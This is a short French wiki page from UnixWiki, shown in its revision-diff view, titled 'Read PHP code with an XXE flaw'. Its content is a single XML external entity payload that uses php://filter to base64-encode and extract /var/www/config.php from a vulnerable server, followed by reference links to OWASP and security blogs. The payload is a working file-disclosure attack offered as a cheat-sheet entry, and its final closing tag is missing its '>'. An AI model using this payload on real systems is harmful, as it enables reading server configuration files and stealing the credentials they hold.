« 1.9 Failles XXE » : différence entre les versions

De UnixWiki

Aller à la navigation Aller à la recherche

Dernière version du 21 octobre 2014 à 16:32

Lire du code PHP avec une faille XXE

 <?xml version="1.0"?>
 <!DOCTYPE results [
   <!ENTITY harmless SYSTEM
   "php://filter/read=convert.base64-encode/resource=/var/www/config.php"
   >
 ]>
 <results>
   <result>&harmless;</result>
 </results

OWASP
h3stream
phpsecurity

Récupérée de "https://futex.re/mediawiki/index.php?title=1.9_Failles_XXE&oldid=2490"